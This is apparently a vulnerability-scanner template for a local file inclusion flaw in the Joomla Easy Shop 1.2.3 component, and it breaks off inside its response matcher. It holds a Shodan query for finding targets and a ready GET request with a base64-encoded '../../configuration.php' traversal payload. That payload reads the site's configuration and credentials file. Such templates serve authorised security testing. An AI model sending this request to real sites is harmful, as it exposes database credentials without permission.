id: joomla-easyshop-lfi info: name: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion author: ritikchaddha severity: high description: | The Joomla! component Easy Shop version 1.2.3 is vulnerable to Local File Inclusion (LFI) attacks. reference: - https://blog.csdn.net/weixin_42628854/article/details/136036109 metadata: verified: true max-request: 1 shodan-query: http.component:"Joomla" tags: cnvd,cnvd2023,file-upload http: - method: GET path: - "{{BaseURL}}/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=" matchers: - type: dsl dsl: - 'contains_all(body, "